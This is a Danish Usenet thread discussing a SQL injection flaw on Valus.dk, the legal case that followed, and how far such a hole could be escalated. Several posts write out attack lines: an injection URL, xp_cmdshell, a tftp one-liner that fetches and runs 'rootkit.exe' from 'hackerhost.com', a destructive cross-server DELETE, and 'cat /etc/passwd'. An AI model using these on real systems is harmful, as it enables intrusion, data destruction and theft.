Blaster udnytter et bufferoverløb og opnår derved
komplet kontrol over maskinen. Ormen kan således
afvikle vilkårlig kode på maskinen.

Valus hullet kunne blot udnyttes ved at sende en forkert
formateret streng til scriptet, som det ukritisk sender
videre til databasen. Man kan altså ikke udføre vilkårlig
kode på webserveren, men blot sende SQL statements til
databasen.

Men jeg kan ikke rigtigt få øje på, hvor sammenligningen
med Blaster skulle føre os hen.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont" wrote

> Valus hullet kunne blot udnyttes ved at sende en forkert
> formateret streng til scriptet, som det ukritisk sender
> videre til databasen. Man kan altså ikke udføre vilkårlig
> kode på webserveren, men blot sende SQL statements til
> databasen.
>
> Men jeg kan ikke rigtigt få øje på, hvor sammenligningen
> med Blaster skulle føre os hen.

Du kan udføre vilkårlig kode på databaseserveren

Kopiere/opdatere/indsætte/slette data og oprette/rette/slette tabeller
og andre objekter i databasen

Hvis der er forskellige databaser og de ligger på samme server så kan du
også tilgå de andre databaser

Hvis samme usr/pwd bruges på andre databaseservere så vil jeg næsten tro
at man også kan tilgå disse databaser

- Peter

---

Peter Lykkegaard wrote:
>
> Du kan udføre vilkårlig kode på databaseserveren

Det er jeg nu ikke sikker på man kan. Umiddelbart er der
kun mulighed for at udføre SQL kode, så medmindre man via
SQL koden kan udføre binær kode, så tager du fejl.

>
> Kopiere/opdatere/indsætte/slette data og oprette/rette/slette tabeller
> og andre objekter i databasen

Ja.

>
> Hvis der er forskellige databaser og de ligger på samme server så kan du
> også tilgå de andre databaser

Ja, det tror jeg på. Og her er det så at jeg synes Valus
svar til Datatilsynet ikke lyder helt troværdigt.

>
> Hvis samme usr/pwd bruges på andre databaseservere så vil jeg næsten tro
> at man også kan tilgå disse databaser

Hvilket brugernavn og password? Hvis du mener det
brugernavn og password, som scriptet bruger til at logge
ind på databasen, så tvivler jeg på at hullet har givet
nogen mulighed for at få fat i det.

(Den her gren er ved at tage en drejning, der hører til
i sikkerhedsgruppen.)

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont" <abuse@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> skrev i
en meddelelse
news:40C37271.63F49E06@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk...
> Peter Lykkegaard wrote:
> >
> > Du kan udføre vilkårlig kode på databaseserveren
>
> Det er jeg nu ikke sikker på man kan. Umiddelbart er der
> kun mulighed for at udføre SQL kode, så medmindre man via
> SQL koden kan udføre binær kode, så tager du fejl.
>
>

Jeg er ikke klar over om der er tale om en Oracle, SQLserver eller ligende.
Men på SQLserver har man en stored procedure ved navn xp_cmdshell
(http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts
_xp_aa-sz_4jxo.asp), der kan bruges til at udføre kommandoer i
operativsystemet.

Måske er der noget lignende på en Oracle server. Omvendt kan der godt være
at sikkerheden på Oracle systemet er strammet ift. SQLserveren.

Lars

---

Lars Hansen wrote:

> Jeg er ikke klar over om der er tale om en Oracle, SQLserver eller ligende.

SQL Server, jfr. debatten på Computerworld Online:
http://debat.computerworld.dk/thread.asp?Mode=View&threadID=3700

FUT: news:dk.edb.sikkerhed

--
Mvh. Kim Ludvigsen

---

Kim Ludvigsen wrote:
>
> Lars Hansen wrote:
>
> > Jeg er ikke klar over om der er tale om en Oracle, SQLserver eller ligende.
>
> SQL Server, jfr. debatten på Computerworld Online:
> http://debat.computerworld.dk/thread.asp?Mode=View&threadID=3700

Lyder ikke som om du helt har forstået hvad SQL er. SQL
er et standard sprog man kan bruge til at skrive database
queries. Til orientering fandt jeg de her to navne på nettet
ISO/IEC 9075:1992, "Information Technology --- Database Languages --- SQL"
ANSI X3.135-1992, "Database Language SQL"

Langt de fleste databaser implementerer SQL (i større
eller mindre udstrækning). Så at det er en SQL database
kommer nok ikke som en overraskelse for nogen, og siger
i øvrigt ikke ret meget om, hvad det er for en database.

Jeg har ikke læst SQL standarden, men jeg tivler på at
standarden giver mulighed for at udføre kode. Det kan man
altså kun, hvis den konkrete implementation har en
udvidelse til det. Og har der været sådan en udvidelse
til stede har hullet være større, end det ellers ville
have været.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont" wrote

> Lyder ikke som om du helt har forstået hvad SQL er. SQL
> er et standard sprog man kan bruge til at skrive database
> queries.

Tjohh, men læste du tråden hos CW?

http://debat.computerworld.dk/thread.asp?Mode=View&threadID=3700
Her er lige et lille pluk fra indlæg 14118:

<citat>
Nå, det ser da helt uskyldigt ud. Gad vide hvad der sker hvis jeg piller
lidt i url'en? hmmm vi prøver lige at ændre det 8 tal til
'%01USER_NAME()' så urlen kommer til at se sådan ud.

http://www.valus.dk/publisering/default.asp?Cid=%01USER_NAME()

hmm. sjovt! Resultatet blev:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'dbo' to a column of data type int.

/publisering/default.asp, line 11
</citat>

Dvs MSSQL er det valgte RDBMS

- Peter

---

Peter Lykkegaard wrote:
>
> "Kasper Dupont" wrote
>
> > Lyder ikke som om du helt har forstået hvad SQL er. SQL
> > er et standard sprog man kan bruge til at skrive database
> > queries.
>
> Tjohh, men læste du tråden hos CW?
>
[...]
>
> Dvs MSSQL er det valgte RDBMS

Det så jeg godt, men er det et definitivt bevis for at det
er en Microsoft SQL Server? Tag et kig på:

http://debat.computerworld.dk/thread.asp?Mode=View&threadID=3700#14124

Og se at lignende fejlmeldinger forekommer efter databasen
er lukket ned. Meldingerne kommer altså ikke fra serveren,
men fra klienten. Så det beviser altså blot, at det er MS
kode, der kører på klienten.

Ville det ikke være muligt at bruge MS kode på klienten
selvom det var en anden server?

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont"

> Det så jeg godt, men er det et definitivt bevis for at det
> er en Microsoft SQL Server?

imho er det

> Tag et kig på:
>
> http://debat.computerworld.dk/thread.asp?Mode=View&threadID=3700#14124
>
> Og se at lignende fejlmeldinger forekommer efter databasen
> er lukket ned. Meldingerne kommer altså ikke fra serveren,
> men fra klienten.

"ODBC SQL Server Driver"
Det er ovenstående du skal kikke på
Det fortæller hvilken database driver der bruges og samtidig hvilken
database der connectes til
Muligvis kan man connecte til en Sybase med en SQL server driver?

> Så det beviser altså blot, at det er MS
> kode, der kører på klienten.

Det beviser hvilken databasedriver der anvendes ja
>
> Ville det ikke være muligt at bruge MS kode på klienten
> selvom det var en anden server?
>
Jow da
Men jeg tvivler nu lidt hvis man samtidig vælger at bruge den omtalte
driver

- Peter

---

In article <40C3802F.DDE4E784@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk>, Kasper Dupont wrote:
>> SQL Server, jfr. debatten på Computerworld Online:
>> http://debat.computerworld.dk/thread.asp?Mode=View&threadID=3700
>
> Lyder ikke som om du helt har forstået hvad SQL er. SQL

Du snakker om SQL server han snakker om SQL Server.

Forskellen er at den sidste er implementeret af Microsoft.

--
Mvh.
Christian E. Lysel
http://www.spindelnet.dk/

---

"Christian E. Lysel" wrote:
>
> In article <40C3802F.DDE4E784@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk>, Kasper Dupont wrote:
> >> SQL Server, jfr. debatten på Computerworld Online:
> >> http://debat.computerworld.dk/thread.asp?Mode=View&threadID=3700
> >
> > Lyder ikke som om du helt har forstået hvad SQL er. SQL
>
> Du snakker om SQL server han snakker om SQL Server.
>
> Forskellen er at den sidste er implementeret af Microsoft.

Microsofts SQL server hedder "Microsoft SQL Server" ikke
blot "SQL Server". Hvis man ikke skriver det fulde navn
er det tvetydigt. Der er f.eks. også en SQL server, der
hedder "GNU SQL Server".

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Kasper Dupont wrote:
>
> Microsofts SQL server hedder "Microsoft SQL Server" ikke
> blot "SQL Server". Hvis man ikke skriver det fulde navn
> er det tvetydigt. Der er f.eks. også en SQL server, der
> hedder "GNU SQL Server".

Læg mærke til, at jeg svarede på dette:
"Jeg er ikke klar over om der er tale om en Oracle, SQLserver eller
ligende".

Så selvom du ikke umiddelbart kunne gennemskue, hvilken SQLserver, der
var tale om, havde jeg altså svaret på "spørgsmålet".

Desuden troede jeg, "SQL Server" var nok til at identificere den som
Microsofts SQL Server. Det var altså med vilje, at jeg skrev "SQL
Server" og ikke "SQLserver". Jeg kendte ikke GNU SQL Server, så jeg
vidste ikke, der kunne være tvivl.

Men jeg havde altså også lavet et link til debatten på Computerworld
Online, så hvis man var i tvivl, skulle man blot klikke og læse lidt ned
på siden.

--
Mvh. Kim Ludvigsen

---

Kasper Dupont skrev:

>> Du kan udføre vilkårlig kode på databaseserveren

>Det er jeg nu ikke sikker på man kan.

Er det ikke en lidt pedantisk skelnen. Der findes binær kode der
heller ikke kan afvikles på en given CPU. "Vilkårlig kode" kan
vel godt betyde "vilkårlig kode som forstås af det system den
sendes til" - altså her lig med "vilkårlig SQL-kode".

Det vil jo være relativt uinteressant at afvikle binær kode på
databaseserveren. SQL giver alle de muligheder man har brug for.

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

Bertel Lund Hansen wrote:
>
> Det vil jo være relativt uinteressant at afvikle binær kode på
> databaseserveren. SQL giver alle de muligheder man har brug for.

Det kommer da fuldstændigt an på, hvad man vil misbruge
muligheden til. Jeg kan hurtigt komme i tanke om nogle
muligheder binær kode ville give som jeg kraftigt tivler
på at man kunne gøre med SQL kode.

1) Installer en password sniffer og få derved fat på
brugernavne og passwords, når der oprettes forbindelser
til databasen.
2) Brug maskinens netforbindelse til at foretage andre
angreb, som måske ellers ikke havde været mulige pga.
en firewall.
3) Find slettede data, som endnu ikke er blevet overskrevet
på disken.
4) Installer en bagdør, så man efterfølgende kan tilgå
databasen uden at sætte yderligere spor i webserverens
log.
5) Udskift dele af OS eller databasekoden for at gøre det
sværere at opdage, at maskinen er kompromiteret.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont" wrote

> Det kommer da fuldstændigt an på, hvad man vil misbruge
> muligheden til. Jeg kan hurtigt komme i tanke om nogle
> muligheder binær kode ville give som jeg kraftigt tivler
> på at man kunne gøre med SQL kode.
>
MSSQL tilbyder en shell kommando
Så er det bare spørgsmålet om at få den binære kode overført til
systemet

- Peter

---

Peter Lykkegaard wrote:
>
> MSSQL tilbyder en shell kommando
> Så er det bare spørgsmålet om at få den binære kode overført til
> systemet

Det strider nu heller ikke imod noget af det jeg har
sagt. Så hvis det faktisk er den server, der er blevet
anvendt har man nok opnået fuld kontrol over maskinen.
Jeg ved ikke hvor nemt det er at få binær kode overført
vha. en Windows shell, men det skulle da ikke overraske
mig, om muligheden var til stede.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont" wrote

> Det strider nu heller ikke imod noget af det jeg har
> sagt. Så hvis det faktisk er den server, der er blevet
> anvendt har man nok opnået fuld kontrol over maskinen.
> Jeg ved ikke hvor nemt det er at få binær kode overført
> vha. en Windows shell, men det skulle da ikke overraske
> mig, om muligheden var til stede.
>
"When xp_cmdshell is invoked by a user who is a member of the sysadmin
fixed server role, xp_cmdshell will be executed under the security
context in which the SQL Server service is running. "

ftp open etc...

- Peter

---

Kasper Dupont wrote:

> Jeg ved ikke hvor nemt det er at få binær kode overført
> vha. en Windows shell, men det skulle da ikke overraske
> mig, om muligheden var til stede.

Det er helt ualmindelig nemt. Tftp er typisk altid tilgængelig og i
path. Nedenstående burde være nok:

tftp -i hackerhost.com GET rootkit.exe .\rootkit.exe | .\rootkit.exe

.... det er en af grundene til at orme har det så let når de kalder en
shell gennem IIS. Men alt andet lige, har man først en root-shell er
der sikkert et utal af muligheder (ikke bare på Windows).

Det skulle i øvrigt heller ikke undre mig om man ikke kunne gøre det
direkte i SQL-serveren hvis man har fuld adgang; få den til at
importere noget binær-kode ind i en tabel, og så udføre det derfra.

--
Niels Callesøe - dk pfy
pfy[at]nntp.dk - http://www.pcpower.dk/disclaimer.php
Bogus virus warnings are spam. Reject them using Postfix:
http://www.t29.dk/antiantivirus.txt

---

In <40C38ACF.3CD07395@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> Kasper Dupont <abuse@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> writes:

>Peter Lykkegaard wrote:
>>
>> MSSQL tilbyder en shell kommando
>> Så er det bare spørgsmålet om at få den binære kode overført til
>> systemet

>Det strider nu heller ikke imod noget af det jeg har
>sagt. Så hvis det faktisk er den server, der er blevet
>anvendt har man nok opnået fuld kontrol over maskinen.
>Jeg ved ikke hvor nemt det er at få binær kode overført
>vha. en Windows shell,

Man kan maaske hente det binaer vha. ftp, saa da findes paa
windows-maskiner.

/Martin

---

"Kasper Dupont" wrote

> Peter Lykkegaard wrote:

> > Du kan udføre vilkårlig kode på databaseserveren
>
> Det er jeg nu ikke sikker på man kan. Umiddelbart er der
> kun mulighed for at udføre SQL kode, så medmindre man via
> SQL koden kan udføre binær kode, så tager du fejl.

Jamen det kan man skam, no problems
xp_cmdshell

> > Hvis samme usr/pwd bruges på andre databaseservere så vil jeg næsten
tro
> > at man også kan tilgå disse databaser
>
> Hvilket brugernavn og password? Hvis du mener det
> brugernavn og password, som scriptet bruger til at logge
> ind på databasen, så tvivler jeg på at hullet har givet
> nogen mulighed for at få fat i det.

På MSSQL kan du blot angive hvilken databaseserver du vil connecte til

DELETE * FROM [servername\instancename.]pubs.dbo.authors.

- Peter

---

Kasper Dupont skrev:

>(Den her gren er ved at tage en drejning, der hører til
>i sikkerhedsgruppen.)

Jeg synes vi hele tiden skal poste til begge grupper. I en given
juridisk sag er man nødt til at have en indgående forståelse af
de tekniske aspekter for at kunne rådgive/dømme rigtigt.

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

"Bertel Lund Hansen" wrote in message

> Kasper Dupont skrev:
>
> >(Den her gren er ved at tage en drejning, der hører til
> >i sikkerhedsgruppen.)
>
> Jeg synes vi hele tiden skal poste til begge grupper. I en given
> juridisk sag er man nødt til at have en indgående forståelse af
> de tekniske aspekter for at kunne rådgive/dømme rigtigt.
>
Det kan du da faktisk have ret i

- Peter

---

Den Sun, 06 Jun 2004 22:52:58 +0200 skrev Bertel Lund Hansen:
> Kasper Dupont skrev:
>
>>(Den her gren er ved at tage en drejning, der hører til
>>i sikkerhedsgruppen.)
>
> Jeg synes vi hele tiden skal poste til begge grupper. I en given
> juridisk sag er man nødt til at have en indgående forståelse af
> de tekniske aspekter for at kunne rådgive/dømme rigtigt.

Sidst vi havde Valus-diskussionen, udtalte de "fine herrer" ellers at
den tekniske side var komplet uinteressant. Det kom kun an på hvad der
er lovligt og ikke er, hvad der rent faktisk var foregået var komplet
uinteressant.

Mvh
Kent
--
Help test this great MMORPG game - http://www.eternal-lands.com/

---

Bertel Lund Hansen wrote:
>
> Jeg synes vi hele tiden skal poste til begge grupper. I en given
> juridisk sag er man nødt til at have en indgående forståelse af
> de tekniske aspekter for at kunne rådgive/dømme rigtigt.

Jeg har flittigt futtet, ikke mindst fordi jeg gerne vil have nogle af
de mere juridisk skolede på banen, og jeg mener at huske, at de ikke er
meget for krydspostede indlæg.

--
Mvh. Kim Ludvigsen

---

Kim Ludvigsen wrote:
>
> Jeg har flittigt futtet, ikke mindst fordi jeg gerne vil have nogle af
> de mere juridisk skolede på banen, og jeg mener at huske, at de ikke er
> meget for krydspostede indlæg.

Så vidt jeg husker var der nogen personer, der havde nogle
ret arrogante holdninger om, at krydspostede tråde ikke
skulle tages seriøst. Men eftersom Bertel har fuldstændig
ret (og jeg har vist også selv påpeget det samme på et
tidspunkt), så mener jeg også indlægene i stor udstrækning
bør krydspostes.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont" wrote

> Peter Lykkegaard wrote:

> > Du kan udføre vilkårlig kode på databaseserveren
>
> Det er jeg nu ikke sikker på man kan. Umiddelbart er der
> kun mulighed for at udføre SQL kode, så medmindre man via
> SQL koden kan udføre binær kode, så tager du fejl.

Jamen det kan man skam, no problems
xp_cmdshell

> > Hvis samme usr/pwd bruges på andre databaseservere så vil jeg næsten
tro
> > at man også kan tilgå disse databaser
>
> Hvilket brugernavn og password? Hvis du mener det
> brugernavn og password, som scriptet bruger til at logge
> ind på databasen, så tvivler jeg på at hullet har givet
> nogen mulighed for at få fat i det.

På MSSQL kan du blot angive hvilken databaseserver du vil connecte til

DELETE * FROM [servername\instancename.]pubs.dbo.authors.

Hvilket faktisk betyder at man teoretisk kunne få fat i
betalingssystemet hvis de kørte på samme databaseserver og brugte samme
usr/pwd

- Peter

---

In <40C37271.63F49E06@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> Kasper Dupont <abuse@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> writes:

>Peter Lykkegaard wrote:
>>
>> Du kan udføre vilkårlig kode på databaseserveren

>Det er jeg nu ikke sikker på man kan. Umiddelbart er der
>kun mulighed for at udføre SQL kode, så medmindre man via
>SQL koden kan udføre binær kode, så tager du fejl.

Hvis det f.x. er en oracle, saa kan man skrive 'host cat /etc/passwd' for at
udfoere unix-kommandoen 'cat /etc/passwd'

/Martin

---

"Kasper Dupont" <abuse@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> skrev i
en meddelelse
news:40C33612.2B8FC3E@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk...
> "Anders Larsson (fjern ikke noget fra email adr.)" wrote:
> >
> > Den rigtige betegnelse må vel være en forespørgsel (HTTP Request).
>
> Det kunne jeg også finde på at kalde det. Men den
> oversættelse findes ikke i min ordbog.

Mener du dermed at ordet ikke findes, eller ikke er i den betydning du mener
er relevant ?

> > Det er jo en anmodning som sendes til serveren, hvor dens database
modtager
> > anmodningen (forespørgslen) om bearbejdning af databasen - f.eks. at
hente
> > data (opslag) eller i dette tilfælde nedlukning.
>
> Vi skal ikke blande de to ting sammen. Der sendes først
> en request til webserveren. Derpå starter webserveren et
> script, der kommunikerer med databaseserveren. Det er
> databaseserveren, der lukker ned pga. kommunikationen
> med scriptet. Webserveren kører upåvirket videre.

Som sådan vil jeg give dig ret, idet det er web serveren som først modtager
HTTP request delen, bearbejder den i et script og herefter (normalt) sender
en query til SQL serveren.
Problemer her er så blot at der ingen fortolkning eller sikkerhedshåndtering
er af den HTTP request som sendes til Webserveren, idet SQL query/kommando
delen sendes videre direkte til SQL serveren.
Altså er SQL serveren ikke bare tilnærmelsesvis fornuftigt isoleret fra
Webdelen.
I en blot nogenlunde fornuftigt installation som er verificeret (iflg.
Valus) af et større sikkerhedsfirma, må man da kunne antage at dette er
udført fornugtigt.
Derfor udføres URL delen som en alm. HTTP request på webserveren, da det er
det applikations lag som slutbrugeren har adgang til.

> I anklagen nævnes kun kommunikationen mellem klienten og
> webserveren. Og nu hvor jeg læser den igen opdager jeg
> endnu en fejl. Udfra formuleringen i anklagen lyder det
> som om det var webserveren, der blev lukket ned. Det er
> ikke sandt. Webserveren kørte videre, det var databaseserveren
> der blev lukket ned.
>
> Godt nok står der intet i anklagen om, hvad det er for
> en server. Men jeg synes helt klart anklagen antyder, at
> det er den server Cubus kommunikerede med, der lukkede
> ned. Intet i anklagen angiver, at der er to forskellige
> servere.
>
> (Læs evt. selv efter og se om ikke min tolkning er korrekt:
> http://cubus-adsl.dk/elteknik/div/valushacker_orientering_0404.php)

Jeg vil give dig ret i at det teknisk er forkert, men vel for lægmand anses
at være det samme.

Spørgsmålet kunne faktisk være interessabt at få belyst.
Er det væsentligt for en sigtelse at sagfremstillingen (sigtelsen) er
teknisk korrekt mht. hvad og hvorledes der i omtalte sag er sket, er er det
nok at det på "lægmandsniveau" giver et tilnærmet billede af hvad der er
sket - selvom tekniske fakta er forkerte eller umulige ?

> > Det ligner ordkløverri, men jeg kunne have på fornemmelsen at det ikke
er
> > helt ligegyldigt om det er en kommando eller forespørgsel.
>
> Det er et tolkningsspørgsmål. Men der er en forskel på
> betydningen af de to ord. Normalt bruges ordet kommando,
> når man har den fulde kontrol med softwaren, altså hvis
> jeg kan give kommandoer til et program, så er det mig
> der bestemmer og programmet adlyder. Med forespørgsler
> (requests) er det anderledes, her spørger man pænt, og
> det er op til programmet at beslutte, om det vil
> efterkomme anmodningen.
>
> Ved at bruge ordet kommando i stedet for request antydes
> det altså, at Valus er helt uden skyld i problemet.

Netop - hvis Valus kan dreje sagen omkring at det er en kommando, antyder
det jo netop at de er uden egen skyld.
Præcis derfor er det meget vigtigt at få afklaret hvorvidt det er en
kommando eller forespørgsel, da de to ord implicit angiver to meget
forskellige hændelsesforløb.
Min personlige opfattelse er at det er en forespørgsel til webserveren, som
fejlagtigt sendes ubehandlet videre til SQL serveren.
Altså en teknisk fejl i webserveren - som i princippet og kunne have ført
til alt muligt andet.

> > Til sammenligning vil jeg kalde det som Blaster, Code Red osv. udfører
for
> > en kommando, selvom det sker på tilnærmelsesvis samme måde som ved
Valus.dk
> >
> > Blaster og Valus metoderne er der teknisk meget stor forskel på.
>
> Først siger du tilnærmelsesvis samme måde, og derpå
> siger du teknisk meget stor forskel. Er du ved at
> modsiger dig selv, eller er der en mening som blot er
> svær at få øje på?

Det jeg mente (eller forsøgte at fortælle) var at der sendes en URL - hvad
der både sker i Valus og orme tilfældet.
Forskellen er at i Valus er det en normal & valid URL - i ormen er det enten
et direkte link til cmd.exe eller et bufferoverflow som ønskes udført. De to
sidste kan på ingen måde siges at være normale URL adresser.
URL'en til cmd.exe er på ingen måde en normal string, og mængden af data for
bufferoverflowet kan vel heller ikke siges at være typisk at indtaste.

Valus URL'en kunne i teorien ske ved en indtastningsfejl - men for de to
orme ville jeg nok ikke anerkende det som en indtastningsfejl - her er
mængden af tegn ganske enkelt for stor.

> Den eneste lighed jeg kan få øje på er, at der i begge
> tilfælde udnyttes et sikkerhedshul i softwaren. Men
> der er stor forskel på, hvad det er for en slags hul,
> og hvad det kan udnyttes til.

Men man kan vel også sige at Cubus har udnyttet et sikkerheds hul i Valus's
applikations software ?

> Blaster udnytter et bufferoverløb og opnår derved
> komplet kontrol over maskinen. Ormen kan således
> afvikle vilkårlig kode på maskinen.
>
> Valus hullet kunne blot udnyttes ved at sende en forkert
> formateret streng til scriptet, som det ukritisk sender
> videre til databasen. Man kan altså ikke udføre vilkårlig
> kode på webserveren, men blot sende SQL statements til
> databasen.
>
> Men jeg kan ikke rigtigt få øje på, hvor sammenligningen
> med Blaster skulle føre os hen.

Ikke andet end hvad man kan lave med et tilpas tilrettet URL.
Og en tilpas tilrettet streg til Valus, er jeg meget sikker på også kunne
have kaldt en stored procedure, som kunne bruges til at afvikle noget kode
direkte på serveren(e). MS Sql server (som Valus anvender) giver faktisk
adgang til at udføre shell kommandoer.


--
MVH Anders (8900)
Det er fordi det er nemmere at læse - vi læser jo ikke nedfra og op.
Hvorfor skal man skrve svaret under det man svarer ?

---

"Anders Larsson (fjern ikke noget fra email adr.)" wrote:
>
> Mener du dermed at ordet ikke findes, eller ikke er i den betydning du mener
> er relevant ?

Jeg mener bare at i min ordbog står request ikke som en
oversættelse af forespørgsel, og vice versa.

>
> Som sådan vil jeg give dig ret, idet det er web serveren som først modtager
> HTTP request delen, bearbejder den i et script og herefter (normalt) sender
> en query til SQL serveren.

Korrekt.

> Problemer her er så blot at der ingen fortolkning eller sikkerhedshåndtering
> er af den HTTP request som sendes til Webserveren,

Der er som sådan ikke noget galt med HTTP requesten. Og
parameteren sendes korrekt videre til scriptet. Det er
først idet scriptet skal til at behandle paramteren, det
går galt, fordi scriptet på ingen måde sikrer sig, at
parametren faktisk er et tal som forventet.

> idet SQL query/kommando
> delen sendes videre direkte til SQL serveren.
> Altså er SQL serveren ikke bare tilnærmelsesvis fornuftigt isoleret fra
> Webdelen.

Korrekt.

> I en blot nogenlunde fornuftigt installation som er verificeret (iflg.
> Valus) af et større sikkerhedsfirma, må man da kunne antage at dette er
> udført fornugtigt.

Det var så åbenbart ikke tilfældet.

> Derfor udføres URL delen som en alm. HTTP request på webserveren, da det er
> det applikations lag som slutbrugeren har adgang til.

?

> >
> > (Læs evt. selv efter og se om ikke min tolkning er korrekt:
> > http://cubus-adsl.dk/elteknik/div/valushacker_orientering_0404.php)
>
> Jeg vil give dig ret i at det teknisk er forkert, men vel for lægmand anses
> at være det samme.

For lægmand er begge dele lige uforståeligt. Spørgsmålet
er, om man kan komme med en forklaring som lægmand kan
forstå (hvis det da overhovedet er nødvendigt). En
tilsyneladende letforståelig forklaring er ikke noget
værd, hvis den er forkert.

>
> Spørgsmålet kunne faktisk være interessabt at få belyst.
> Er det væsentligt for en sigtelse at sagfremstillingen (sigtelsen) er
> teknisk korrekt mht. hvad og hvorledes der i omtalte sag er sket, er er det
> nok at det på "lægmandsniveau" giver et tilnærmet billede af hvad der er
> sket - selvom tekniske fakta er forkerte eller umulige ?

Som sagen står nu sider der en lægmand på hver side og
prøver at argumentere med hinanden. (mere eller mindre).

Cubus har i hvert fald ifølge sit eget udsagn ikke på
forhånd vidst noget om, hvad der foregik. Forhåbentlig
har han på nuværende tidspunkt forstået det. Jeg kan
selvfølgelig ikke vide med sikkerhed, om han er så
uvidende som han giver udtryk for, eller om det er
skuespil for at se uskyldig ud.

På den anden side har vi Valus, der præsterer en
tiltale fyldt med tekniske fejl. Hvorfor lader man ikke
sådan en tiltale blive gennemlæst af en person, der ved
noget om, hvad der er foregået? Hvis ikke Valus har
nogle ansatte, der kunne have opdaget fejlene, har de så
overhovedet nogen ansatte, der er kompetente nok til at
drive et site, der tager vare på andre folks penge?

>
> > > Det ligner ordkløverri, men jeg kunne have på fornemmelsen at det ikke
> er
> > > helt ligegyldigt om det er en kommando eller forespørgsel.
> >
> > Det er et tolkningsspørgsmål. Men der er en forskel på
> > betydningen af de to ord. Normalt bruges ordet kommando,
> > når man har den fulde kontrol med softwaren, altså hvis
> > jeg kan give kommandoer til et program, så er det mig
> > der bestemmer og programmet adlyder. Med forespørgsler
> > (requests) er det anderledes, her spørger man pænt, og
> > det er op til programmet at beslutte, om det vil
> > efterkomme anmodningen.
> >
> > Ved at bruge ordet kommando i stedet for request antydes
> > det altså, at Valus er helt uden skyld i problemet.
>
> Netop - hvis Valus kan dreje sagen omkring at det er en kommando, antyder
> det jo netop at de er uden egen skyld.
> Præcis derfor er det meget vigtigt at få afklaret hvorvidt det er en
> kommando eller forespørgsel, da de to ord implicit angiver to meget
> forskellige hændelsesforløb.

Kommando - nej, forespørgsel måske. Men ifølge min ordbog
oversættes det med anmodning.

> Min personlige opfattelse er at det er en forespørgsel til webserveren, som
> fejlagtigt sendes ubehandlet videre til SQL serveren.

Korrekt.

> Altså en teknisk fejl i webserveren - som i princippet og kunne have ført
> til alt muligt andet.

Nærmere bestemt en fejl i et script, der køres på webserveren.

>
> > > Til sammenligning vil jeg kalde det som Blaster, Code Red osv. udfører
> for
> > > en kommando, selvom det sker på tilnærmelsesvis samme måde som ved
> Valus.dk
> > >
> > > Blaster og Valus metoderne er der teknisk meget stor forskel på.
> >
> > Først siger du tilnærmelsesvis samme måde, og derpå
> > siger du teknisk meget stor forskel. Er du ved at
> > modsiger dig selv, eller er der en mening som blot er
> > svær at få øje på?
>
> Det jeg mente (eller forsøgte at fortælle) var at der sendes en URL - hvad
> der både sker i Valus og orme tilfældet.
> Forskellen er at i Valus er det en normal & valid URL - i ormen er det enten
> et direkte link til cmd.exe eller et bufferoverflow som ønskes udført. De to
> sidste kan på ingen måde siges at være normale URL adresser.
> URL'en til cmd.exe er på ingen måde en normal string, og mængden af data for
> bufferoverflowet kan vel heller ikke siges at være typisk at indtaste.

Det er meget svært at trække grænsen mellem normalt og
unormalt. Havde en tast ved et uheld siddet fast nede
kunne man nok have lavet et bufferoverløb fra tastaturet.
De længste legitime URLer jeg har set var f.eks. et
tilfælde hvor en person havde kopieret et længere stykke
kode ind i søgefeltet på google, og den resulterende URL
var på 1611 tegn. Og et andet tilfælde et script, der
tog så mange parametre, at URLen blev 1492 tegn lang.
Den slags taster man selvfølgelig ikke direkte ind i sin
browsers URL felt, men man kan sagtens cut'n'paste det
til URL feltet eller et indtastningsfelt i en webformular.

>
> Valus URL'en kunne i teorien ske ved en indtastningsfejl - men for de to
> orme ville jeg nok ikke anerkende det som en indtastningsfejl - her er
> mængden af tegn ganske enkelt for stor.

Jeg tvivler nu på at man kunne være kommet til at indtaste
den URL ved en fejl. Men man kunne sagtens ved en fejl
komme til at indtaste en URL, der afslørede hullet. Det er
jeg da selv flere gange kommet til på sites med lignende
huller.

>
> Men man kan vel også sige at Cubus har udnyttet et sikkerheds hul i Valus's
> applikations software ?

Ja. Man kan vel godt kalde et asp script for applikations
software.

>
> Ikke andet end hvad man kan lave med et tilpas tilrettet URL.
> Og en tilpas tilrettet streg til Valus, er jeg meget sikker på også kunne
> have kaldt en stored procedure, som kunne bruges til at afvikle noget kode
